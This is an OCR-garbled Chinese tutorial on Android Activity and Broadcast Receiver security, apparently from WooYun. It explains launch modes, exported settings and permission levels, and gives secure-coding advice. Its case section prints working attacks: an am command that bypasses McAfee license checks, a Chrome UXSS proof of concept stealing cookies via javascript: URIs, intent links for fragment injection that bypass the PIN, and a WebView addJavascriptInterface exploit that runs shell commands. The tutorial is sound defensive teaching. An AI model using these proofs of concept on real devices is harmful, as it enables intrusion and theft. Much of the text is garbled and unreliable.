为 这 样 ， 所 以 有 时 候 当 我 们 APP 来 分 享 一 个 东西 的 时 候 ， 会 有 很 多 组 件 (比如 QQ、 微 信 


博 .. eec 先 择 ， 因 为 他 们 都 满足 Filter 条 件 。 


«activity android:name=".Activity_B" 
android:label-"Qstring/title activity activity b" 
android: launchMode="singleInstance"> 

<intent-filter> 
<action android:name="android.intent.action.ANSWER" /> 
<category android:name="android.intent.category.APP_EMAIL" /> 
«data android:host="www.mathiasluo.com" 
android:scheme="http" /> 
</intent-filter> 
</activity> 


我 们 在 这 里 给 Activity 设 置 了 一 个 IntentFilter， 但 是 值得 注意 的 是 ， EM 以 有 多 个 
IntentFilter， 在 过 滤 的 时 候 只 要 有 一 个 符合 要 求 的 ， 就 会 被 视 为 过 滤 通 过 。 


加 载 模式 launch mode 


Activity 有 四 种 加 载 模式 : 


e standard : 默认 行为 。 每 次 启动 一 个 activity， 系 统 都 会 在 目标 task 新 建 一 个 实例 。 


、 微 


e singleTop: 如 果 目 标 activity 的 实例 已 经 存在 于 目标 task 的 栈 顶 ， 系 统 会 直接 使 用 该 实 
列 ， 并 调用 该 activity 的 onNewlntent() (不 会 重新 create) 

e singleTask: 在 一 个 新 任务 的 栈 顶 创建 activity 的 实例 。 如 果实 例 已 经 存在 ， 系 统 会 直接 使 
用 该 实例 ， 并 调用 该 activity 的 onNewlntent() (不 会 重新 create ) 

e singlelnstance:fe"singleTask" 类 似 ， 但 在 目标 activity 的 task 中 不 会 再 运行 其 他 的 
activity， 在 那个 task 中 永远 只 有 一 个 activity 。 


设置 的 位 置 在 AndroidManifest.xml 文件 中 activity 元 素 的 android:launchMode 属性 : 


«activity android:name="ActB" android: launchMode="sSingleTask"></activity> 


Activity launch mode 用 于 控制 创建 task 和 Activity 3:4] ° Rik“standard“## X, » Standard 模式 
一 次 启动 即 会 生成 一 个 新 的 Activity 实例 并 且 不 会 创建 新 的 task， 被 启动 的 Activity 和 启动 的 
Ay 在 同一 个 栈 中 。 当 创建 新 的 task 时 ，intent 中 的 内 容 有 可 能 被 恶意 应 用 读 取 ， 所 以 建议 

若 无 特 别 需 求 使 用 默认 的 standard 模式 ， 即 不 配置 launch mode 属性 ，launchMode 能 被 
Intent 的 flag Æ žŽ ° 


taskAffinity 


android 系 统 中 task 管理 Activity，Task 的 命名 取决 于 root Activity 的 affinity。 

默认 情况 下 ，app 中 的 每 个 Activity 都 使 用 app 的 包 名 作为 affinity。 而 Task 的 分 配 取决 于 app ° 
故 默认 情况 下 一 个 app 中 所 有 的 Activity 属于 同一 task。 要 改变 task 的 分 配 ， 可 以 在 
AndroidManifest.xml 文件 中 设置 affinity 的 值 ， 但 是 这 样 做 会 有 不 同 task 启动 Activity 携带 的 
intent 中 的 信息 被 其 他 应 用 读 取 的 风险 。 


FLAG_ACTIVITY_NEW_TASK 


intent flag 中 一 个 重要 的 flag È Activity 时 通过 setFlags() 或 者 addFlags() 方法 设置 intent 
的 flags， 属 性 能 够 改变 launch mode * FLAG ACTIVITY NEW TASK 标记 代表 创建 新 的 
task (被 启动 的 Activity 既 不 在 前 台 也 不 在 后 台 ) 。 

FLAG_ACTIVITY_MULTIPLE_TASK 标 记 能 和 FLAG ACTIVITY_NEW_TASK 同时 设置 ， 这 
种 情况 下 必 会 创建 的 task， 所 以 intent 中 不 应 携带 敏感 数据 。 


Task 


stack:Activity 承担 了 大 量 的 显示 和 交互 工作 ， 从 茶 种 角度 上 将 ， 我 们 看 见 的 应 用 程序 就 是 许 
多 个 Activity 的 组 合 。 为 了 让 这 多 同 工 作 而 不 至 于 产生 混乱 ，Android 平 台 设 计 了 

一 种 堆栈 机 制 用 于 管理 Activity， 其 遵循 先进 后 出 的 原则 ， 系 统 总 是 显示 位 于 栈 顶 的 Activity * 

位 于 栈 顶 的 Activity 也 就 是 最 后 " 开 pte o 

Task: 是 指 将 相关 的 Activity 组 合 到 一 起 ， 以 Activity Stack 的 方式 进行 管理 。 从 用 户 体验 上 

讲 ， 一 个 “应 用 程序 "就 是 一 个 Task， 但 是 从 根本 上 讲 ， 一 个 Task 是 可 以 有 一 个 或 多 个 Android 

Application 组 成 的 


如 果 用 户 离 开 一 个 task 很 长 时 间 ， 系 统 会 清理 栈 顶 以 下 的 activity， 这 样 task 被 从 新 打开 时 ， 
栈 顶 activity 就 被 还 原 了 。 
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"singleTask" 


Intent Selector 


多 个 Activity 具有 相同 action 时 ， 当 此 调用 此 action 时 会 弹出 一 个 选择 器 供用 户 选择 。 


权限 


android:exported 


— ^ Activity 组 件 能 否 被 外 部 应 用 启动 取决 于 此 属性 ， 设 置 为 true 时 Activity 可 以 被 外 部 应 用 局 
动 ， 设 置 为 false 则 不 能 ， 此 时 Activity 只 能 被 自身 app 启 动 。( 同 user id 或 者 root 也 能 启动 ) 
没有 配置 intent-filter 的 action 属 性 exported RU X false (没有 filter 只 能 通过 明确 的 类 名 来 启动 
activity 故 相 当 于 只 有 程序 本 身 能 启动 ) ， 配 置 了 intent-filter 的 action 属 性 exported 默 认为 

true ° 

exported 属 性 只 是 用 于 限制 Activity 是 否 暴露 给 其 他 app， 通 过 配置 文件 中 的 权限 申明 也 可 以 限 
制 外 部 启动 activity 。 


android: protectionLevel 


Android Activity Security 


http://developer.android.com/intl/zh-cn/guide/topics/manifest/permission-element.html 


<permission> 


SYNTAX: 


<permission android:description="string resource" 


android:icon="dravable resource" 


android:label="string resource" 
android:name="string" 


android:permissionGroup="string" 


android: protectionLevel=["normal" | "dangerous" | 


"normal" 


" " 
dangerous 


"signature" 


"signatureOrSystem" 


"signature" | "signatureOrSystem"] /» 


The default value. A lower-risk permission that gives requesting 
applications access to isolated application-level features, with minimal 
risk to other applications, the system, or the user. The system 
automatically grants this type of permission to a requesting application 
at installation, without asking for the user's explicit approval (though the 
user always has the option to review these permissions before 
installing). 


A higher-risk permission that would give a requesting application access 
to private user data or control over the device that can negatively impact 
the user. Because this type of permission introduces potential risk, the 
system may not automatically grant it to the requesting application. For 
example, any dangerous permissions requested by an application may be 
displayed to the user and require confirmation before proceeding, or 
some other approach may be taken to avoid the user automatically 
allowing the use of such facilities. 


A permission that the system grants only if the requesting application is 
signed with the same certificate as the application that declared the 
permission. If the certificates match, the system automatically grants 
the permission without notifying the user or asking for the user's explicit 
approval. 


A permission that the system grants only to applications that are in the 
Android system image or that are signed with the same certificate as the 
application that declared the permission. Please avoid using this option, 
as the signature protection level should be sufficient for most needs and 
works regardless of exactly where applications are installed. The 
"signatureOrSystem" permission is used for certain special situations 
where multiple vendors have applications built into a system image and 
need to share specific features explicitly because they are being built 
together. 


normal: 默 认 值 。 低 风险 权限 ， 只 要 申请 了 就 可 以 使 用 ， 安 装 时 不 需要 用 户 确认 。 

dangerous : 像 NRITE_SETTING 和 SEND_SMS 等 权限 是 有 风险 的 ， 因 为 这 些 权 限 能 够 用 来 
重新 配置 设备 或 者 导致 话费 ， 使 用 此 protectionLevel 来 标识 用 户 可 能 关注 的 一 些 权 限 。 
Android 将 会 在 安装 程序 时 ， 警 示 用 户 关于 这 些 权限 的 需求 ， 具 体 的 行为 可 能 依据 Android 版 
本 或 者 所 安装 的 移动 设备 而 有 所 变化 。 
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signature : 这 些 权 限 仅 授予 那些 和 本 程序 应 用 了 相同 密 钥 来 签名 的 程序 。 
signatureOrSystem: 与 signature 类 似 ， 除 了 一 点 ， 系 统 中 的 程序 也 需要 有 资格 来 访问 ， 这 样 
允许 定制 Android 系统 应 用 也 能 获得 权限 ， 这 种 保护 等 级 有 助 于 集成 系统 编译 过 程 。 


<!-- *** POINT 1 *** Define a permission with protectionLevel="Signature" --> 

<permission 

android:name-"org.jssec.android.permission.protectedapp.MY PERMISSION" 

android:protectionLevel-"signature" /» 

«application 

android: icon="@drawable/ic_launcher" 

android: label="@string/app_name" > 

<!-- *** POINT 2 *** For a component, enforce the permission with its permission attri 

bute --> 

<activity 

android:name=".ProtectedActivity" 

android: exported="true" 

android: label="@string/app_name" 

android:permission-"org.jssec.android.permission.protectedapp.MY PERMISSION" > 

<!-- *** POINT 3 *** If the component is an activity, you must define no intent-filter 
E 


«/activity» 


关键 方法 


e onCreate(Bundle savedlInstanceState) 

e setResult(int resultCode, Intent data) 

e startActivity(Intent intent) 

e startActivityForResult(Intent intent, int requestCode) 
e onActivityResult(int requestCode, int resultCode, Intent data) 
e setResult (int resultCode, Intent data) 

e getStringExtra (String name) 

e addFlags(int flags) 

e setFlags(int flags) 

e setPackage(String packageName) 

e getAction() 

e setAction(String action) 

e getData() 

e setData(Uri data) 

e getExtras() 

e putExtra(String name, String value) 


0x02 Activity 7 3: 


Activity 类 型 和 使 用 方式 决定 了 其 风险 和 防御 方式 , 故 将 Activity 分 类 如 下 : Private、Public、 
Parter ` In-house 


Table 4.1-1 Definition of Activity Types 


Private Activity An activity that cannot be launched by another application, and 
therefore is the safest activity 


Public Activity An activity that is kupposed to be used by an unspecified large 
number of applications. 


Partner Activity An activity that can only be used by specific applications made by a 
trusted partner company. 


In-house Activi An activity that can only be used by other in-house applications. 





Figure 4.1-1 


private activity 


私有 Activity 不 应 被 其 他 应 用 启动 相对 是 安全 的 

创建 activity 时 : 

1、 不 指定 taskAffinity //task'£ activity ° task4.£ 5: T JKactivitys7affinity > Ski it E v 
Activity 使 用 包 名 做 为 affinity。task 由 app 分 配 ， 所 以 一 个 应 用 的 Activity 在 默认 情况 下 属于 相同 
task， 跨 task 局 动 Activity 的 intent 有 可 能 被 其 他 app 读 取 到 。 

2、 不 指定 lunchMode /默认 standard， 建 议 使 用 默认 ， 创 建新 task 时 有 可 能 被 其 他 应 用 读 取 
intent 的 内 容 。 

3、 设 置 exported 属性 为 false 

4 > i£ 4E 4: 3? Mintent 中 接收 的 数据 ， 不 管 是 否 内 部 发 送 的 intent 

5、 敏 感 信息 只 能 在 应 用 内 部 操作 


使 用 activity 时 : 
6、 开 启 activity 时 不 设置 FLAG_ACTIVITY_ NEW. TASK 标签 
/WFLAG_ACTIVITY_NEW_TASK 标 签 用 于 创建 新 task (被 启动 的 Activity 并 未 在 栈 中 ) 。 


7、 开 启 应 用 内 部 activity 使 用 显 式 启动 的 方式 
8、 当 putExtra() 包含 敏感 信息 目的 应 是 app 内 的 activity 
` TENA RAGE > PERERA da Sm A 


public activity 


公开 暴露 的 Activity 组 件 ， 可 以 被 任意 应 用 启动 


创建 activity : 
1、 设 置 exported 属 性 为 true 
、 谨 懂 处 理 接收 的 intent 
3、 有 返回 数据 时 不 应 包含 敏感 信息 
使 用 activity : 
4、 不 应 发 送 敏感 信息 
5^5 SRP RARE TE ha a E 
Parter、in-house 部 分 参阅 http://www.jssec.org/dl/android_securecoding_en.pdf 


安全 


全 建议 


app 内 使 用 的 私有 Activity 不 应 配置 intent-filter， 如 果 配 置 了 intent-filter 需 设置 exported 属 
tE X false ° 

使 用 默认 taskAffinity 

使 用 默认 launchMode 

启动 Activity 时 不 设置 intent 的 FLAG_ACTIVITY_NEW_TASK 标 签 

谨 懂 处 理 接收 的 intent 以 及 其 携带 的 信息 

签名 验证 内 部 (in-house) app 

当 Activity 返 回 数据 时 候 需 注意 目标 Activity 是 否 有 泄露 信息 的 风险 

目的 Activity 十 分 明确 时 使 用 显 式 启动 

i 4E Ab 3E Activity 返回 的 数据 ， 目 的 Activity 返回 的 数据 有 可 能 是 恶意 应 用 伪造 的 

验证 目标 Activity 是 否 和 恶意 app， 以 免 受到 intent 欺骗 ， 可 用 hash 签名 验证 

When Providing an Asset Secondhand, the Asset should be Protected with the Same 

Level of Protection 

尽 可 能 的 不 发 送 敏感 信息 ， 应 考虑 到 局 动 public Activity 中 intent 的 信息 均 有 可 能 被 恶意 
I F] $5 FLAY UT 


0x04 测试 方法 


查看 activity : 


反 编 译 查 看 配置 文件 AndroidManifest.xml 中 activity 组 件 (关注 配置 了 intent-filter 的 及 未 
i #.export=“false” 44 ) 


e 直接 用 RE 打开 安装 后 的 app 查看 配置 文件 
e Drozer 扫 描 :run app.activity.info -a packagename 
e 动态 查看 logcat 设置 filter 的 tag 为 ActivityManager 


启动 activity : 


e adb shell : am start -a action -n package/componet 

e drozer: run app.activity.start --action android.action.intent. VIEW ... 
。 自己 编写 app 调 用 startActiviy() 或 startActivityForResult() 

e 浏览 器 intent scheme 远程 启动 


0x05 & 4| 


& 91 : 绕 过 本 地 认证 


绕 过 McAfee 的 key 验 证 ， 免 费 激活 。 
$ am start -a android.intent.action.MAIN -n com.wsandroid.suite/com.mcafee.main.MfeMain 


"a. 


Análisis de seguridad Análisis de seguridad 
Bienvenido a McAfee Mobile teja su dispositivo y manténgalo à ymenazad Proteja su ivo y manténgalo a 
Security 
McAfee Mobile Security le ofrece una solución integral 


aa Analizar ahora PERR 


Estamos analizando las aplicaciones 
Actualizar ahora 


Elementos analizados: 15 


Amenazas detectadas ( 


joyli 


ra mantener sus datos 
óvil a salvo de 





案例 2 : 本 地 拒绝 服务 


可 以 被 外 部 app 调用 export 出 来 的 接口 ， 寻 致 crash 


条 例 3 : UXSS 


漏洞 存在 于 Chrome Android 版 本 v18.0.1025123 ， class 
"com.google.android.apps.chrome.SimpleChromeActivity" 允许 恶意 应 用 注入 js 代码 到 任意 域 . 
部 分 AndroidManifest.xml 配置 文件 如 下 


«activity android:name-"com.google.android.apps.chrome.SimpleChromeActivity" android:1 
aunchMode-"singleTask" 
android: configChanges="keyboard|keyboardHidden|orientation|screenSize"> 
<intent-filter> 
«action android:name-"android.intent.action.VIEW" /> 
«category android:name-"android.intent.category.DEFAULT" /» 
</intent-filter> 
</activity> 


Class "com.google.android.apps.chrome.SimpleChromeActivity" 配置 但 是 未 设置 
"android:exported" 为 "false". 恶意 应 用 先 调用 该 类 并 设置 data 为 "http://google.com" 
再 次 调用 时 设置 data 为 恶意 js ffl 4»'javascript:alert(document.cookie)', 恶意 代码 将 
在 http://google.com 域 中 执行 . 


"com.google.android.apps.chrome.SimpleChromeActivity" class 可 以 通过 Android api 或 者 
am (activityManager) 打开 . POC 如 下 


public class TestActivity extends Activity { 
@Override 
public void onCreate(Bundle savedInstanceState) { 
super.onCreate(savedInstanceState); 
Intent i - new Intent(); 
ComponentName comp - new ComponentName( 
"com.android.chrome", 
"com.google.android.apps.chrome.SimpleChromeActivi 
ty"); 
i.setComponent(comp); 
i.setAction("android.intent.action.VIEW"); 
Uri data - Uri.parse("http://google.com"); 
i.setData(data); 


startActivity(i); 


J E 
Thread.sleep(5000); 


catch (Exception e) {} 


data = Uri.parse("javascript:alert(document.cookie)"); 
i.setData(data); 


startActivity(i); 


案例 4 : 隐 式 启动 intent 包含 敏感 数据 


暂 缺 可 公开 案例 ,攻击 模型 如 下 图 。 


Application A 
Call an activity with 


Application 
the implicit intent 


selector 


A-1 


Private Activity A-1 EN 


exported-" false" 
action-" X" 


Application B 


d sy bi x iA When the activity B-1 that has the 
exported- true : ; 5 
action=“ X" same action exists, OS display the 
selector dialog, and public activity B-1is 
called depends on user selection. 


Android device 





案例 5 : Fragment 注 入 ( 绕 过 PIN+ 拒 绝 服务 ) 
Fragment 这 里 只 提 一 下 ， 以 后 可 能 另 写 一 篇 。 


«a href="intent:#Intent;S.:android:show fragment-com.android.settings.ChooseLockPasswo 
rd$ChooseLockPasswordFragment;B.confirm credentials-false; 


launchFlags-0x00008000;SEL;action-android.settings.SETTINGS;end"- 
«/a»«br» 


© FB ii 420 12:44 


E A 四 


我 的 设备 账户 更 多 


选择 PIN 码 





«a href="intent:#Intent;S.:android: show_fragment=XXxXxX; launchFlags=0x00008000; SEL; compo 
nent=com.android.settings/com.android.settings.Settings;end"> 
</a><br> 


很 抱 菊 “设置 "已 停止 运行 。 





案例 6:webview RCE 


«a href="intent:#Intent;component=com.gift.android/.activity.WebViewIndexActivity;S.ur 
l-http://drops.wooyun.org/webview.html;S.title-WebView;end"» 
«/a»«br» 


Android Activity Security 





如 果 当 前 app 和 存在 漏洞 ， 将 会 在 页 面 中 输出 
存在 漏洞 的 接口 万 便 程序 员 做 出 修改 : 


lvmm 
searchBoxJavaBridge_ 


wooyun UXSS 测试 


测试 完成 





发 现 了 4 个 漏洞 ， 详 情 如 下 : 
FE: https://code.google.com/p/chromium/ 
issues/detail?id=143437 


存在 漏洞 : https://code.google.com/p/chromium/ 
issues/detail?id=37383 


存在 漏洞 : https://code.google.com/p/chromium/ 
issues/detail?id=98053 


存在 漏洞 : https://code.google.com/p/chromium/ 
issues/detail?id=90222 


Webview 类 是 Android SDK 中 封装 的 用 于 显示 网 页 的 组 件 ， 通 过 Webview 组 件 应 用 可 以 轻松 
地 开发 内 置 浏 览 器 访问 网 页 ， 同 时 webview 组 件 中 还 提供 了 一 些 接口 实现 应 用 与 页 面 中 
Javascript 脚本 的 交互 ， 其 中 用 于 javascript 调用 导出 的 java 类 的 AddJavascriplnterface 方法 
被 发 现存 在 远程 命令 执行 漏洞 ， 攻 击 者 可 以 找到 存在 "getClass'" 方 法 的 对 象 ， 然 后 通过 反射 的 
机 制 ， 得 到 Java Runtime 对 象 ， 然 后 调用 静态 方法 来 执行 系统 命令 。 


用 户 在 使 用 包含 此 漏洞 的 应 用 访问 特定 的 网 页 时 会 执行 网 页 中 的 恶意 代码 ， 可 导致 手机 被 远 
程控 制 。 相 关 漏 洞 代码 示例 如 下 : 


WebView webView = new WebView (R.id.webView1) ; 
webView.getSettings().setJavaScriptEnabled(true); 
webView.addJavascriptInterface(new TEST(), "demo"); 
webView.loadUrl("http://127.0.0.1/check.htm1"); 


Check.html 代码 : 


«html» 

«script» 

function execute(cmd){ 

return demo.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invok 
e(null,null).exec(cmd); 


execute(['/system/bin/sh','-c','echo "hello" » /sdcard/check.txt']); 
«/script» 
</html> 


调用 demo 对 象 的 getClass 方 法 得 到 java.lang.Runtime 对 象 ， 然 后 通过 java 反 射 机 制 调用 


getRuntime 方 法 获得 runtime 实 例 ， 最 终 通过 exec 方 法 执行 命令 。 代 码 执行 成 功 会 在 SD 卡 根 
目录 下 生成 check.txt 文 件 。 


访问 webview.html 进行 漏洞 自动 检测 ， 代 码 如 下 : 
原理 : 遍历 所 有 Wwindow 的 对 象 ， 然 后 找到 包含 getClass 方 法 的 对 象 ,如 果 存 在 此 方法 的 对 象 则 
说 明 该 接口 存在 漏洞 。 


<script type="text/javascript"> 


function check() 


{ 


for (var obj in window) 


{ 
C SE 
if ("getClass" in window[obj]) { 
try{ 
window[obj].getClass(); 
document.write('<span style="color:red">'+obj+'</span>'); 
document.write('<br />'); 
scatch(e){ 
} 
} 
} catch(e) { 
} 
} 
} 
check(); 
</script> 


webview addJavascript 接口 远程 代码 执行 漏洞 最 时 发 现 于 2012 年 (CVE-2012-6636) > 
2013 年 出 现 新 攻击 方法 (CVE-2013-4710) ， 同 时 在 2014 年 发 现在 安 卓 
android/webkit/webview 中 默认 内 置 的 一 个 searchBoxJavaBridge 接口 同时 存在 远程 代码 执行 
漏洞 (CVE-2014-1939) ， 开 发 者 可 以 使 用 
removeJavascriptInterface("searchBoxJavaBridge") 方法 来 移 除 这 个 默认 接口 以 确保 应 用 安 
全 。 而 前 不 久 ， 有 安全 人 员 发 现 了 两 个 新 的 攻击 向 量 (attack vectors ) 存在 于 
android/webkit/AccessibilityInjector.java 中 ， 调 用 了 此 组 件 的 应 用 在 开启 辅助 功能 选项 中 第 三 
方 服务 的 安 草 系统 中 会 造成 远程 代码 执行 漏洞 。 这 两 个 接口 分 别 是 "accessibility" 
fe"accessibilityTraversal" ， 此 漏洞 原理 与 searchBoxJavaBridge_ 接口 远程 代码 执行 相似 ， 均 
为 未 移 除 不 安全 的 默认 接口 ， 不 过 此 漏洞 需要 用 户 局 动 系统 设置 中 的 第 三 方 辅助 服务 ， 利 用 
条 件 较 复杂 。 


0x06 参考 


http://www.jssec.org/dl/android_securecoding_en.pdf 
http://www.cis.syr.edu/~wedu/Research/paper/webview_acsac2011.pdf 
https://github.com/mzlogin/awesome-adb 
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Android Broadcast Security 


原文 by JS 9& A 


0x00 科普 


Broadcast Recevier 广播 接收 器 是 一 个 专注 于 接收 广播 通知 信息 ， 并 做 出 对 应 处 理 的 组 件 。 
很 多 广播 是 源 自 于 系统 代码 的 一 比如， 通知 时 区 改变 、 电 池 电 量 低 、 拍 摄 了 一 张 照 片 或 者 用 
户 改 变 了 语言 选项 。 应 用 程序 也 可 以 进行 广播 一 比如 说 ， 通 知 其 它 应 用 程序 一 些 数据 下 载 完 
成 并 处 于 可 用 状态 。 应 用 程序 可 以 拥有 任意 数量 的 广播 接收 器 以 对 所 有 它 感 兴趣 的 通知 信息 
予以 响应 。 

所 有 的 接收 器 均 继 承 自 BroadcastReceiver 基 类 。 广播 接收 器 没有 用 户 界 面 。 然 而 ， 它 们 可 
以 启动 一 个 activity 来 响应 它们 收 到 的 信息 ， 或 者 用 NotificationManager 来 通知 用 户 。 通 知 可 
以 用 很 多 种 方式 来 吸引 用 户 的 注意 力 一 闪 动 背 灯 、 震 动 、 播 放声 音 等 等 。 一 般 来 说 是 在 状态 
栏 上 放 一 个 持久 的 图 标 ， 用 户 可 以 打开 它 并 获取 消息 。 


Android) EHLI 


Broadcast 
Reveicer B 


Broadcast 
Reveicer A 


à 
Android 


Broadcast 
Reveicer C 


Broadcast 
Reveicer D 





drops wooyunong 


0x01 知识 要 点 


注册 形式 : 动态 or 静态 
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n 属性 指定 了 实现 了 这 个 activity 的 Activity 的 子 类 。icon 和 label 属性 指向 了 包含 展 
给 用 户 的 此 activity 的 图 标 和 标签 的 资源 文件 。 其 它 组 件 也 以 类 似 的 方法 声明 一 LEAT 
E ， 元 素 用 于 声明 广播 接收 器 ， 而 元 素 用 于 声明 内 容 提供 器 
manifest 文件 中 未 进行 声明 的 activity、 服 务 以 及 内 容 提 供 器 将 不 为 系统 所 见 ， 从 而 也 就 不 会 
被 运行 。 然 而 ， 广 播 接收 器 既 可 以 在 manifest 文 件 中 声明 ， 也 可 以 在 代码 中 进行 动态 的 创建 ， 
并 以 调用 Context.registerReceiver() 的 方式 注册 至 系统 。 





Definition method Characteristic 
Static Broadcast Define by writing There is a restriction that some Broadcasts 
Receiver <receiver> elements in (e.g. ACTION_BATTERY_CHANGED) sent by 


AndroidManifest.xml system cannot be received. 
Broadcast can be received from 
application's initial boot till uninstallation. 


Dynamic Broadcast By calling Broadcasts which cannot be received by 
Receiver registerReceiver() and static Broadcast Receiver can be received. 
unregisterReceiver() ina The period of receiving Broadcasts can be 


program, controlled by the program. For example, 
register /unregister Broadcasts can be received only while 
Broadcast Receiver Activity is on the front side. 

dynamically. Private Broadcast Receiver cannot be 








created. drops.wooyun.org 





(静态 与 动态 注册 广播 接收 器 区 别 ) 


回调 方法 
广播 接收 器 只 有 一 个 回调 方法 : void onReceive(Context curContext, Intent broadcastMsg) 


当 广 播 消 息 抵达 接收 器 时 ，Android 调用 它 的 onReceive() 方法 并 将 包含 消息 的 Intent 对 象 传 
递 给 它 ， 广 播 接收 器 仅 在 它 执行 这 个 方法 时 处 于 活路 状态 ， 当 onReceive() 返回 后 ， 它 即 为 失 
活 状态 。 

拥有 一 个 活跃 状态 的 广播 接收 器 的 进程 被 保护 起 来 而 不 会 被 杀 死 ， 但 仅 拥有 失 活 状态 组 件 的 
进程 则 会 在 其 它 进程 需 要 它 所 占有 的 内 存 的 时 候 随 时 被 杀 掉 。 

这 种 方式 引出 了 一 个 问题 : 如 果 响 应 一 个 广播 信息 需要 很 长 的 一 段 时 间 ， 我 们 一 般 会 将 其 纳 
入 一 个 衍生 的 线程 中 去 完成 ， 而 不 是 在 主线 程 内 完成 它 ， 从 而 保证 用 户 交 互 过 程 的 流畅 。 如 
果 onReceive() 衍 生 了 一 个 线程 并 且 返 回 ， 则 包含 新 线程 在 内 的 整个 进程 都 被 会 判 为 失 活 状 态 

(除非 进程 内 的 其 它 应 用 程序 组 件 仍 处 于 活跃 状态 ) ， 于 是 它 就 有 可 能 被 杀 掉 。 这 个 问题 的 

解决 方法 是 令 onReceive() 启动 一 个 新 服务 ， 并 用 其 完成 任务 ， 于 是 系统 就 会 知道 进程 中 仍然 
在 处 理 着 工作 。 

不 要 在 广播 里 添加 过 多 逻辑 或 者 进行 任何 耗 时 操作 ， 因 为 在 广播 中 是 不 允许 开辟 线程 的 ， 当 

onReceiver( ) 方 法 运行 较 长 时 间 ( 超 过 10 秒 ) 还 没有 结束 的 话 ， 那 么 程序 会 报错 (ANR), 广播 更 
多 的 时 候 扮演 的 是 一 个 打开 其 他 组 件 的 角色 ， 上 比如 启动 Service、Notification 提 示 、Activity 


A 


AF o 


权限 


设置 接收 app 


Intent setPackage(String packageName) 
(Usually optional) Set an explicit application package name that limits the components 
this Intent will resolve to. 


设置 接收 权限 


abstract void sendBroadcast(Intent intent, String receiverPermission) 
Broadcast the given intent to all interested BroadcastReceivers, allowing an optional 
required permission to be enforced. 


protectionLevel 

normal: 默 认 值 。 低 风险 权限 ， 只 要 申请 了 就 可 以 使 用 ， 安 装 时 不 需要 用 户 确 认 。 

dangerous : 像 WRITE_SETTING 和 SEND SMS 等 权限 是 有 风险 的 ， 因 为 这 些 权限 能 够 用 来 
重新 配置 设备 或 者 导致 话费 ， 使 用 此 protectionLevel 来 标识 用 户 可 能 关注 的 一 些 权限 。 
Android 将 会 在 安装 程序 时 ， 警 示 用 户 关于 这 些 权限 的 需求 ， 具 体 的 行为 可 能 依据 Android 版 
本 或 者 所 安装 的 移动 设备 而 有 所 变化 。 

signature : 这 些 权限 仅 授予 那些 和 本 程序 应 用 了 相同 密 钥 来 签名 的 程序 。 
signatureOrSystem: 与 signature 类 似 ， 除 了 一 点 ， 系 统 中 的 程序 也 需要 有 资格 来 访问 。 这 样 
允许 定制 Android 系统 应 用 也 能 获得 权限 ， 这 种 保护 等 级 有 助 于 集成 系统 编译 过 程 。 


广播 类 型 


系统 广播 : 像 开 机 启动 、 接 收 到 短信 、 电 池 电 量 低 这 类 事件 发 生 的 时 候 系 统 都 会 发 出 特定 的 
广播 去 通知 应 用 ， 应 用 接收 到 广播 后 会 以 某 种 形式 再 转告 用 户 。 
自 定义 广播 : 不 同 于 系统 广播 事件 ， 应 用 可 以 为 自己 的 广播 接收 器 自 定义 出 一 条 广播 事件 。 


Ordered Broadcast 


OrderedBroadcast- 有 序 广播 ，Broadcast- 普 通 广 播 ， 他 们 的 区 别 是 有 序 广播 发 出 后 ， 能 够 适 
配 的 广播 接收 者 按照 一 定 的 权限 顺序 接收 这 个 广播 ， 并 且 前 面 的 接收 者 可 以 对 广播 的 内 容 进 
行 修改 ， 修 改 的 结果 被 后 面 接收 者 接收 ， 优 先 级 高 的 接收 者 还 可 以 结束 这 个 广播 ， 那 么 后 面 
优先 级 低 的 接收 者 就 接收 不 到 这 个 广播 了 。 而 普通 广播 发 出 后 ， 能 够 是 适 配 的 接收 者 没有 一 
定 顺序 接收 广播 ， 也 不 能 终止 广播 。 


sticky broadcast 


有 这 么 一 种 broadcast， 在 发 送 并 经 过 AMS(ActivityManagerService) 分 发 给 对 应 的 receiver 
后 ， 这 个 broadcast 并 不 会 被 丢弃 ， 而 是 保存 在 AMS 中 ， 当 有 新 的 需要 动态 注册 的 receiver 
请 求 AMS 注 册 时 ， 如 果 这 个 receiver 能 够 接收 这 个 broadcast， 那 么 AMS 会 将 在 receiver 注册 
成 功 之 后 ， 马 上 向 receiver 发 送 这 个 broadcast。 这 种 broadcast 我 们 称 之 为 


stickybroadcast ° 


sendStickyBroadcast() 字面 意思 是 发 送 粘性 的 广播 ， 使 用 这 个 api 需要 权限 


android.Manifest.permission.BROADCAST STICKY, 粘性 广播 的 特点 是 Intent 会 一 直 保 留 到 
广播 事件 结束 ， 而 这 种 广播 也 没有 所 谓 的 10 秒 限制 ，10 秒 限制 是 指 普通 的 广播 如 果 
onReceive 方法 执行 时 间 太 长 ， 超 过 10 秒 的 时 候 系统 会 将 这 个 广播 置 为 可 以 干掉 的 


candidate ， 一 旦 系统 资源 不 够 的 时 候 ， 就 会 干掉 这 个 广播 而 让 它 不 执行 。 











rocess Broadcasts in order 


Receive Broadcasts later, which 
have been already sent 





( 几 种 广播 的 特性 ) 


变动 








Characteristic behavior of Normal Ordered Sticky Sticky Ordered 
Broadcast Broadcast Broadcast Broadcast | Broadcast 
Limit Broadcast Receivers 
which can receive Broadcast, OK OK - 一 
by Permission | 
Get the results of f 

u : process from F ok ok 
Broadcast Receiver 
Make Broadcast’ Receivers 

一 OK 一 OK 





OK 


sa hired 


android3.1 以 及 之 后 版 本 广播 接收 器 不 能 在 启动 应 用 前 注册 。 可 以 通过 设置 intent “flag 为 
Intent.FLAG INCLUDE STOPPED PACKAGES 将 广播 发 送 给 未 启动 应 用 的 广播 接收 器 。 


关键 方法 


e sendBroadcast(intent) 


e sendOrderedBroadcast(intent, null, mResultReceiver, null, 0, null, null) 
e onReceive(Context context, Intent intent) 


e getResultData() 

e abortBroadcast() 

e registerReceiver() 
e unregisterReceiver() 


e LocalBroadcastManager.getlnstance(this).sendBroadcast(intent) 


e sendStickyBroadcast(intent) 


0x02 分 类 


Private broadcast | A broadcast receiver that can receive broadcasts only from the same 
receiver application, therefore is the safest broadcast receiver 


receiver unspecified large number of applications 
broadcast receiver | In-house applications 









Receive broadcasts only 
from the same application? 







Receive broadcasts only 
from unspecified number 


application? 
Private Broadcast Receiver Public Broadcast Receiver In-house Broadcast Receiver 


1. 私有 广播 接收 器 : 只 接收 app 自 身 发 出 的 广播 
2. 公共 广播 接收 器 : 能 接收 所 有 app 发 出 的 广播 
3. 内 部 广播 接收 器 : 只 接收 内 部 app 发 出 的 广播 





ooyun.org 


安全 建议 


intent-filter 节 点 与 exported 属性 设置 组 合 建议 


we of exported attribute 
Not specified 


